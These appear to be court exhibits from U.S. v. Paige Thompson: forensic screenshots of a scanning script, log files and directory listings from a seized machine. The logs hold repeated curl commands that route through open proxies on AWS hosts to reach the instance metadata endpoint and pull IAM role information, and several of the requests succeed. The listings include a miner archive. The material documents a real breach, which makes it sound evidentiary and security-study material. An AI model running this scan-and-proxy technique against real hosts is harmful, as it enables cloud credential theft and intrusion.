```
README ☒
1   empirical list of ports to scan
2
3   xzcat new_all.xz| shuf | awk '{print $1":80\n" $1":82\n" $1":808\n" $1":3128\n" $1":3129\n" $1":8000\n"
    $1":8001\n" $1":8080\n" $1":8181\n" $1":8888\n" $1":8081\n" $1":8181\n" $1":8090\n" "https://"$1":8443\n"
    "https://"$1 ":443" }' | parallel -j1000 --tag --progress ./scan_for_metadata.sh
4
5
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 640
Admitted_____

```
7-03-19.443.log ☒
1   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.214.25.54:443 http://169.254.169.254/latest/meta-data/iam/info
2   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.197.205:443 http://169.254.169.254/latest/meta-data/iam/info
3   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.127.161.88:443 http://169.254.169.254/latest/meta-data/iam/info
4   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.236.16.20:443 http://169.254.169.254/latest/meta-data/iam/info
5   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.62.80.179:443 http://169.254.169.254/latest/meta-data/iam/info
6   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://176.34.104.30:443 http://169.254.169.254/latest/meta-data/iam/info
7   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.59.28.187:8443 http://169.254.169.254/latest/meta-data/iam/info
8   curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.196.146.101:443 http://169.254.169.254/latest/meta-data/iam/info
9   {
10    "Code" : "Success",
11    "LastUpdated" : "2019-03-08T04:04:13Z",
12    "InstanceProfileArn" : "arn:aws:iam::          5582:instance-profile/
13    "InstanceProfileId" :                 Y3RQ"
14  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.239.215.158:443 http://169.254.169.254/latest/meta-data/iam/info
15  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.235.8.209:443 http://169.254.169.254/latest/meta-data/iam/info
16  {
17    "Code" : "Success",
18    "LastUpdated" : "2019-03-08T04:29:28Z",
19    "InstanceProfileArn" : "arn:aws:iam:          6483:instance-profile/
20    "InstanceProfileId" :                 LEI6"
21  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.32.47.236:443 http://169.254.169.254/latest/meta-data/iam/info
22  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.209.134.131:443 http://169.254.169.254/latest/meta-data/iam/info
23  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.127.129.251:8443 http://169.254.169.254/latest/meta-data/iam/info
24  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.35.67.210:443 http://169.254.169.254/latest/meta-data/iam/info
25  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.59.4.171:443 http://169.254.169.254/latest/meta-data/iam/info
26  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.214.172.29:443 http://169.254.169.254/latest/meta-data/iam/info
27  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.72.63.104:443 http://169.254.169.254/latest/meta-data/iam/info
28  {
29    "Code" : "Success",
30    "LastUpdated" : "2019-03-08T04:02:16Z",
31    "InstanceProfileArn" : "arn:aws:iam::          8609:instance-profile/
32    "InstanceProfileId" :                 7YVA"
33  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.18.89.222:443 http://169.254.169.254/latest/meta-data/iam/info
34  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.232.146.106:443 http://169.254.169.254/latest/meta-data/iam/info
35  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://3.80.208.26:443 http://169.254.169.254/latest/meta-data/iam/info
```

640-002

```
 ┌─ 7-03-19.443.log ─ ☒ ──────────────────────────────────────────────────────────────────────────────────────
 70  {
 71    "Code" : "Success",
 72    "LastUpdated" : "2019-03-08T03:47:06Z",
 73    "InstanceProfileArn" : "arn:aws:iam::          1427:instance-profile/
 74    "InstanceProfileId" :                     NY22"
 75  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.220.114.11:443 http://169.254.169.254/latest/meta-data/iam/info
 76  {
 77    "Code" : "Success",
 78    "LastUpdated" : "2019-03-08T04:13:33Z",
 79    "InstanceProfileArn" : "arn:aws:iam::          3701:instance-profile/
 80    "InstanceProfileId" :                     QDMK"
 81  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.239.93.133:443 http://169.254.169.254/latest/meta-data/iam/info
 82  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.201.2.203:443 http://169.254.169.254/latest/meta-data/iam/info
 83  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.56.232.56:443 http://169.254.169.254/latest/meta-data/iam/info
 84  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.234.97.18:443 http://169.254.169.254/latest/meta-data/iam/info
 85  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.213.111.76:443 http://169.254.169.254/latest/meta-data/iam/info
 86  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.220.49.141:443 http://169.254.169.254/latest/meta-data/iam/info
 87  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.72.210.220:443 http://169.254.169.254/latest/meta-data/iam/info
 88  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.76.48.213:443 http://169.254.169.254/latest/meta-data/iam/info
 89  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.127.58.24:443 http://169.254.169.254/latest/meta-data/iam/info
 90  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.38.170.131:443 http://169.254.169.254/latest/meta-data/iam/info
 91  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.198.107.105:443 http://169.254.169.254/latest/meta-data/iam/info
 92  {
 93    "Code" : "Success",
 94    "LastUpdated" : "2019-03-08T04:10:37Z",
 95    "InstanceProfileArn" : "arn:aws:iam:         3769:instance-profile/
 96    "InstanceProfileId" :                     WRXO"
 97  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://3.121.200.114:443 http://169.254.169.254/latest/meta-data/iam/info
 98  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.173.210.136:443 http://169.254.169.254/latest/meta-data/iam/info
 99  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.28.237.205:443 http://169.254.169.254/latest/meta-data/iam/info
100  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.53.193.8:443 http://169.254.169.254/latest/meta-data/iam/info
101  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.232.178.225:443 http://169.254.169.254/latest/meta-data/iam/info
102  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://3.122.165.203:443 http://169.254.169.254/latest/meta-data/iam/info
103  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.207.214.233:443 http://169.254.169.254/latest/meta-data/iam/info
104  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.83.240.42:443 http://169.254.169.254/latest/meta-data/iam/info
105  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.44.237.253:443 http://169.254.169.254/latest/meta-data/iam/info
106  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.236.133.181:8443 http://169.254.169.254/latest/meta-data/iam/info
107  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.173.172.115:443 http://169.254.169.254/latest/meta-data/iam/info
108  {
```

```
       11-3-19.443.log ⊠
712    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.177.138.235:443 http://169.254.169.254/latest/meta-data/iam/info
713    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.213.161.24:443 http://169.254.169.254/latest/meta-data/iam/info
714    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.230.171.1:443 http://169.254.169.254/latest/meta-data/iam/info
715    {
716      "Code" : "Success",
717      "LastUpdated" : "2019-03-12T04:10:32Z",
718      "InstanceProfileArn" : "arn:aws:iam::         5972:instance-profile/
719      "InstanceProfileId" :                      7YSS"
720    }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.47.65.5:443 http://169.254.169.254/latest/meta-data/iam/info
721    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.250.156.187:443 http://169.254.169.254/latest/meta-data/iam/info
722    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.70.60.107:443 http://169.254.169.254/latest/meta-data/iam/info
723    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.202.59.236:443 http://169.254.169.254/latest/meta-data/iam/info
724    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.71.50.166:443 http://169.254.169.254/latest/meta-data/iam/info
725    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.168.58.7:443 http://169.254.169.254/latest/meta-data/iam/info
726    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.55.1.43:443 http://169.254.169.254/latest/meta-data/iam/info
727    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.56.238.255:443 http://169.254.169.254/latest/meta-data/iam/info
728    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.203.56.75:443 http://169.254.169.254/latest/meta-data/iam/info
729    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.245.165.172:443 http://169.254.169.254/latest/meta-data/iam/info
730    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.234.188.25:443 http://169.254.169.254/latest/meta-data/iam/info
731    {
732      "Code" : "Success",
733      "LastUpdated" : "2019-03-12T04:53:27Z",
734      "InstanceProfileArn" : "arn:aws:iam::        9784:instance-profile/
735      "InstanceProfileId" :                     P446"
736    }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.82.157.155:443 http://169.254.169.254/latest/meta-data/iam/info
737    {
738      "Code" : "Success",
739      "LastUpdated" : "2019-03-12T04:16:18Z",
740      "InstanceProfileArn" : "arn:aws:iam:       5804:instance-profile/
741      "InstanceProfileId" :                     IMR6"
742    }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.197.63.165:443 http://169.254.169.254/latest/meta-data/iam/info
743    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443 http://169.254.169.254/latest/meta-data/iam/info
744    {
745      "Code" : "Success",
746      "LastUpdated" : "2019-03-12T04:35:09Z",
747      "InstanceProfileArn" : "arn:aws:iam:       7507:instance-profile/
748      "InstanceProfileId" :                     UVWW"
749    }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.157.132.103:443 http://169.254.169.254/latest/meta-data/iam/info
750    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.242.190.101:443 http://169.254.169.254/latest/meta-data/iam/info
751    curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.159.42:443 http://169.254.169.254/latest/meta-data/iam/info
752    {
753      "Code" : "Success",
754      "LastUpdated" : "2019-03-12T04:14:51Z",
755      "InstanceProfileArn" : "arn:aws:iam:       9479:instance-profile/
756      "InstanceProfileId" :                     OWXO"
```

```
14-03-19.non443.log
25  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.112.1.238:8080 http://169.254.169.254/latest/meta-data/iam/info
26  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.236.213.222:808 http://169.254.169.254/latest/meta-data/iam/info
27  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.222.164.7:8118 http://169.254.169.254/latest/meta-data/iam/info
28  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.21.97.41:80 http://169.254.169.254/latest/meta-data/iam/info
29  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.154.18.220:80 http://169.254.169.254/latest/meta-data/iam/info
30  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://63.35.180.125:8888 http://169.254.169.254/latest/meta-data/iam/info
31  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.223.224.37:81 http://169.254.169.254/latest/meta-data/iam/info
32  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.234.62.16:80 http://169.254.169.254/latest/meta-data/iam/info
33  {
34      "Code" : "Success",
35      "LastUpdated" : "2019-03-14T10:46:23Z",
36      "InstanceProfileArn" : "arn:aws:iam::         7295:instance-profile/
37      "InstanceProfileId" :                    NY6Y"
38  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.17.182.157:3128 http://169.254.169.254/latest/meta-data/iam/info
39  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3129 http://169.254.169.254/latest/meta-data/iam/info
40  {
41      "Code" : "Success",
42      "LastUpdated" : "2019-03-14T10:35:40Z",
43      "InstanceProfileArn" : "arn:aws:iam::         5156:instance-profile/
44      "InstanceProfileId" :               3OTR"
45  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.230.94.207:80 http://169.254.169.254/latest/meta-data/iam/info
46  {
47      "Code" : "Success",
48      "LastUpdated" : "2019-03-14T10:34:21Z",
49      "InstanceProfileArn" : "arn:aws:iam::         0976:instance-profile/
50      "InstanceProfileId" :               OHEK"
51  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.56.74.202:3128 http://169.254.169.254/latest/meta-data/iam/info
52  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.174.204.120:80 http://169.254.169.254/latest/meta-data/iam/info
53  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.175.199.206:8888 http://169.254.169.254/latest/meta-data/iam/info
54  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.9.19.220:3128 http://169.254.169.254/latest/meta-data/iam/info
55  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.251.144.8:8888 http://169.254.169.254/latest/meta-data/iam/info
56  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.114.159.59:80 http://169.254.169.254/latest/meta-data/iam/info
57  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.94.113.114:3128 http://169.254.169.254/latest/meta-data/iam/info
58  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.233.234.169:80 http://169.254.169.254/latest/meta-data/iam/info
59  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.58.159.44:80 http://169.254.169.254/latest/meta-data/iam/info
```



| Name ▼ | Description | Type | Size | Created | Modified ▲ | Record changed | Attr. | 1st sector | M |
|---|---|---|---|---|---|---|---|---|---|
| 📁.. = aws_scan (3,868,755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... | |
| 📁. = metadata_old4 (570,728) | existing | | 2.2 GB | 07/10/2019 10:18... | 05/29/2019 00:49... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,501... | |
| 📄99.81.8.247:80 | existing | 247:80 | 290 B | 07/10/2019 10:19... | 03/27/2019 20:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,671,02... | |
| 📄99.81.8.247:443 | existing | 247:443 | 290 B | 07/10/2019 10:19... | 03/27/2019 20:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,671,02... | |
| 📄99.81.6.133:443 | existing, already viewed | html | 10.9 KB | 07/10/2019 10:19... | 03/27/2019 21:51... | 07/19/2019 06:24... | Crwxrwxrwx | 40,880,352 | |
| 📄99.81.5.92:443 | existing, already viewed | json | 249 B | 07/10/2019 10:19... | 03/27/2019 08:02... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,86... | |
| 📄99.81.5.220:80 | existing, already viewed | html | 218 B | 07/10/2019 10:19... | 03/27/2019 10:38... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... | |
| 📄99.81.3.36:80 | existing, already viewed | html | 214 B | 07/10/2019 10:19... | 03/28/2019 05:32... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,02... | |
| 📄99.81.16.147:443 | existing | 147:443 | 1.0 KB | 07/10/2019 10:19... | 03/28/2019 10:09... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,03... | |
| 📄99.81.1.198:443 | existing | 198:443 | 249 B | 07/10/2019 10:18... | 03/26/2019 09:44... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,808... | |
| 📄99.81.1.185:80 | existing | 185:80 | 315 B | 07/10/2019 10:19... | 03/27/2019 12:20... | 07/19/2019 06:24... | rwxrwxrwx | 11,668,78... | |
| 📄99.81.1.185:443 | existing | 185:443 | 315 B | 07/10/2019 10:19... | 03/27/2019 12:20... | 07/19/2019 06:24... | rwxrwxrwx | 11,668,78... | |
| 📄99.81.1.156:80 | existing | 156:80 | 169 B | 07/10/2019 10:19... | 03/27/2019 08:01... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... | |
| 📄99.81.1.156:443 | existing | 156:443 | 0.7 KB | 07/10/2019 10:19... | 03/27/2019 08:01... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... | |
| 📄99.81.0.229:443 | existing | 229:443 | 249 B | 07/10/2019 10:18... | 03/27/2019 00:19... | 07/19/2019 06:24... | rwxrwxrwx | 7,393,375... | |
| 📄99.80.99.169:80 | existing | 169:80 | 21 B | 07/10/2019 10:18... | 03/26/2019 06:08... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,612... | |
| 📄99.80.99.169:443 | existing | 169:443 | 21 B | 07/10/2019 10:18... | 03/26/2019 06:08... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,612... | |
| 📄99.80.98.91:443 | existing, already viewed | 91:443 | 0 B | 07/10/2019 10:19... | 03/27/2019 11:27... | 07/19/2019 06:24... | rwxrwxrwx | 11,302,60... | |
| 📄99.80.98.57:80 | existing | 57:80 | 214 B | 07/10/2019 10:19... | 03/27/2019 17:19... | 07/19/2019 06:24... | rwxrwxrwx | 11,669,64... | |

Partition    File    Preview    Details    Gallery    Calendar    Legend    Raw   Text

# Not Found

The requested URL /latest/meta-data was not found on this server.

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 643
Admitted_____







1b52-md126-luksopen, Vol...

\home\erratic\aws_hacking_shit\aws_scan\metadata_old4

| Name | Description | Type | Size | Created | Modified | Record changed | Attr. | 1st sector |
|---|---|---|---|---|---|---|---|---|
| .. = aws_scan (3,868,755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... |
| . = metadata_old4 (570,728) | existing | | 2.2 GB | 07/10/2019 10:18... | 05/29/2019 00:49... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,501... |
| 99.81.8.247:80 | existing | 247:80 | 290 B | 07/10/2019 10:19... | 03/27/2019 20:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,671,02... |
| 99.81.8.247:443 | existing | 247:443 | 290 B | 07/10/2019 10:19... | 03/27/2019 20:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,671,02... |
| 99.81.6.133:443 | existing, already viewed | html | 10.9 KB | 07/10/2019 10:19... | 03/27/2019 21:51... | 07/19/2019 06:24... | Crwxrwxrwx | 40,880,352 |
| 99.81.5.92:443 | existing, already viewed | json | 249 B | 07/10/2019 10:19... | 03/27/2019 08:02... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,86... |
| 99.81.5.220:80 | existing, already viewed | html | 218 B | 07/10/2019 10:19... | 03/27/2019 10:38... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... |
| 99.81.3.36:80 | existing | html | 214 B | 07/10/2019 10:19... | 03/28/2019 05:32... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,02... |
| 99.81.16.147:443 | existing | 147:443 | 1.0 KB | 07/10/2019 10:19... | 03/28/2019 10:09... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,03... |
| 99.81.1.198:443 | existing | 198:443 | 249 B | 07/10/2019 10:18... | 03/26/2019 09:44... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,808... |
| 99.81.1.185:80 | existing | 185:80 | 315 B | 07/10/2019 10:19... | 03/27/2019 12:20... | 07/19/2019 06:24... | rwxrwxrwx | 11,668,78... |
| 99.81.1.185:443 | existing | 185:443 | 315 B | 07/10/2019 10:19... | 03/27/2019 12:20... | 07/19/2019 06:24... | rwxrwxrwx | 11,668,78... |
| 99.81.1.156:80 | existing | 156:80 | 169 B | 07/10/2019 10:19... | 03/27/2019 08:01... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... |
| 99.81.1.156:443 | existing | 156:443 | 0.7 KB | 07/10/2019 10:19... | 03/27/2019 08:01... | 07/19/2019 06:24... | rwxrwxrwx | 11,301,85... |
| 99.81.0.229:443 | existing | 229:443 | 249 B | 07/10/2019 10:18... | 03/27/2019 00:19... | 07/19/2019 06:24... | rwxrwxrwx | 7,393,375... |
| 99.80.99.169:80 | existing | 169:80 | 21 B | 07/10/2019 10:18... | 03/26/2019 06:08... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,612... |
| 99.80.99.169:443 | existing | 169:443 | 21 B | 07/10/2019 10:18... | 03/26/2019 06:08... | 07/19/2019 06:24... | rwxrwxrwx | 7,233,612... |
| 99.80.98.91:443 | existing, already viewed | 91:443 | 0 B | 07/10/2019 10:19... | 03/27/2019 11:27... | 07/19/2019 06:24... | rwxrwxrwx | 11,302,60... |
| 99.80.98.57:80 | existing | 57:80 | 214 B | 07/10/2019 10:19... | 03/27/2019 17:19... | 07/19/2019 06:24... | rwxrwxrwx | 11,669,64... |

Partition File Preview Details Gallery Calendar Legend Raw Text

# Forbidden

You don't have permission to access /latest/meta-data on this server.

X-Ways Forensics: 1B52-md126-results - [1b52-md126-luksopen, Volume]
File Edit Search Navigation View Tools Specialist Options Window Help
20.4 SR-4 x64
Case Data
1b52-md126-CapitalOne-Vi... 1b52-md126-luksopen, Vol...
\home\erratic\aws_hacking_shit\aws_scan\ami-id.tar
49 files, 1 dir.
Name Description Type Size Created Modified Record changed
aws_scan (3,869,502) existing 17.8 GB 07/10/2019 10:05... 05/29/2019 01:10... 07/19/2019 06:22...
ami-id.tar (98) existing, already viewed tar 100 KB 07/10/2019 10:16... 03/04/2019 08:57... 07/19/2019 06:24...
PaxHeaders.234025 (49) existing 4.3 KB
100.26.152.153.metadata.80 existing ascii_unix 293 B 03/04/2019 05:26...
100.27.45.251.metadata.443 existing, already viewed ascii_unix 293 B 03/04/2019 01:18...
13.127.161.88.metadata.443 existing ascii_unix 293 B 03/04/2019 02:14...
13.234.55.245.metadata.80 existing ascii_unix 293 B 03/04/2019 08:57...
18.130.66.41.metadata.8118 existing ascii_unix 293 B 03/04/2019 01:55...
18.203.19.19.metadata.443 existing ascii_unix 293 B 03/04/2019 01:06...
18.204.247.252.metadata.443 existing ascii_unix 293 B 03/04/2019 00:51...
18.207.214.233.metadata.443 existing ascii_unix 293 B 03/04/2019 06:43...
18.209.231.95.metadata.443 existing ascii_unix 293 B 03/04/2019 03:26...
18.214.25.54.metadata.443 existing ascii_unix 293 B 03/04/2019 00:51...
18.218.73.88.metadata.80 existing ascii_unix 293 B 03/04/2019 03:21...
18.220.114.11.metadata.443 existing, already viewed ascii_unix 298 B 03/04/2019 03:35...
18.232.146.106.metadata.443 existing ascii_unix 293 B 03/04/2019 04:37...
18.232.178.225.metadata.443 existing ascii_unix 293 B 03/04/2019 03:53...
3.122.165.203.metadata.443 existing, already viewed ascii_unix 293 B 03/04/2019 06:36...
3.122.165.203.metadata.80 existing ascii_unix 293 B 03/04/2019 06:35...
3.208.89.89.metadata.443 existing ascii_unix 293 B 03/04/2019 00:39...
3.80.208.26.metadata.443 existing ascii_unix 293 B 03/04/2019 06:42...
3.83.134.155.metadata.443 existing ascii_unix 293 B 03/04/2019 08:46...
3.91.207.167.metadata.443 existing ascii_unix 293 B 03/04/2019 05:57...
3.94.21.233.metadata.443 existing ascii_unix 293 B 03/04/2019 05:32...
3.95.15.238.metadata.443 existing, already viewed ascii_unix 293 B 03/04/2019 04:06...
34.200.243.56.metadata.443 existing ascii_unix 293 B 03/04/2019 03:04...
34.201.2.203.metadata.443 existing ascii_unix 293 B 03/04/2019 08:23...
34.218.233.158.metadata.3128 existing ascii_unix 307 B 03/04/2019 07:47...
34.239.93.133.metadata.443 existing ascii_unix 293 B 03/04/2019 03:58...
.shutter (3)
.snes9x (1)
.snowmix (0)
.ssh (165)
.stardict (0)
.steam (11)
.subversion (3)
.terraform.d (2)
.thumbnails (22)
.travis (2)
.uml (0)
.var (142,881)
.vbox (1)
.vice (0)
.w3m (4)
.weechat (24)
.wetfish_images (14,249)
.wine (3,036)
.xdg_menu_cache (2)
.xine (0)
.znc (3,651)
1.19.04_StorCLI.zip (13)
8-07-14_MegaCLI.zip (10)
annoying (3)
audio-projects (0)
aws_hacking_shit (6,969,949)
aws.tar (13)
aws_scan (3,869,502)
54.164.114.241.binary.user-data (1)
all (343)
ami-id.tar (98)
apperian (0)
awsscanner (2)
awstmp (0)
collected (333)
ec2-full-stuff (64)
k8s (0)
kube (2)
lost+found (2)
metadata (382,741)
metadata_old (1,945,315)
metadata_old_3 (289,213)
metadata_old2 (680,199)
metadata_old4 (570,797)
metadata-remote (1)
miner (64)
miner.tar (164)
s3 (76)
scan.tar (4)
AWSSCAN (518,566)
Partition File Preview Details Gallery Calendar Legend Raw Text
Selected: 1 file (298 B)
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/

643-003

1b52-md126-luksopen, Vol...

\home\erratic\aws_hacking_shit\aws_scan

| Name | Description | Type | Size | Created | Modified | Record changed | Attr. | 1st sector |
|---|---|---|---|---|---|---|---|---|
| .. = aws_hacking_shit (5,549,429) | existing | | 109 GB | 07/10/2019 09:42... | 07/02/2019 17:30... | 07/19/2019 06:21... | rwxrwxrwx | 7,044,587... |
| . = aws_scan (3,868,755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... |
| scan.log4 | existing | log4 | 39 B | 07/10/2019 10:17... | 04/13/2019 17:17... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... |
| run.sh | existing, already viewed | sh | 293 B | 07/10/2019 10:17... | 04/03/2019 13:45... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... |
| README | existing, already viewed | ascii_u... | 326 B | 07/10/2019 10:16... | 03/22/2019 01:23... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... |
| prescan.sh | existing, already viewed | sh | 416 B | 07/10/2019 10:16... | 04/06/2019 17:53... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,628... |
| ports.txt | existing | txt | 96 B | 07/10/2019 10:17... | 03/04/2019 00:37... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,672... |
| pass | existing | | 17 B | 07/10/2019 10:19... | 03/14/2019 07:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,07... |
| new_all2.xz | existing, already viewed | xz | 28.1 MB | 07/10/2019 10:16... | 04/06/2019 16:33... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,560... |
| new_all.xz | existing | xz | 141 MB | 07/10/2019 10:16... | 03/19/2019 00:58... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,617... |
| new-ec2-credentials-describe-instances | existing, already viewed | json | 115 KB | 07/10/2019 10:16... | 03/04/2019 10:08... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,328 |
| nano | existing, already viewed | | 0 B | 07/10/2019 10:17... | 03/08/2019 18:39... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,709... |
| miner.tar | existing | tar | 13.4 MB | 07/10/2019 10:17... | 04/04/2019 15:42... | 07/19/2019 06:24... | Crwxrwxrwx | 20,838,832 |
| metadata_to_date_03_19_19 | existing | | 29.7 KB | 07/10/2019 10:16... | 03/19/2019 04:35... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,424 |
| metadata.scanner.joblog | existing | tsv | 1.1 GB | 07/10/2019 10:17... | 03/14/2019 17:30... | 07/19/2019 06:24... | Crwxrwxrwx | 20,839,008 |
| mega_metadata.txt | existing, already viewed | txt | 46.6 KB | 07/10/2019 10:17... | 04/02/2019 07:40... | 07/19/2019 06:24... | Crwxrwxrwx | 20,838,808 |
